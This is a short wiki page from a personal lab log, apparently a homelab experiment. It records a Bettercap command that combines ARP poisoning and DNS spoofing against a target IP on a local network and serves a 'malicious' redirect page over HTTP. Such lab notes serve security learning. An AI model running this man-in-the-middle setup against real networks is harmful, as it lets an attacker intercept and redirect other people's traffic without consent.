From charlesreid1

Revision as of 02:24, 25 August 2016 by Admin (talk | contribs) (Created page with "Second experiment, now that I know I need to be running an ARP spoofing attack simultaneous with the DNS attack. Start by running the Bettercap command: <pre> bettercap -I w...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Second experiment, now that I know I need to be running an ARP spoofing attack simultaneous with the DNS attack.

Start by running the Bettercap command:

bettercap -I wlan1 -O bettercap_extrabacon.log -S ARP -X \
    --gateway 192.168.0.1 --target 192.168.0.7 \
    --dns extrabacon.conf --dns-port 53 \
    --httpd --httpd-path ./pub

This sets up the ARP poisoning, and runs the DNS spoofing on port 53. It runs an HTTP host to host our malicious NOPE redirect page.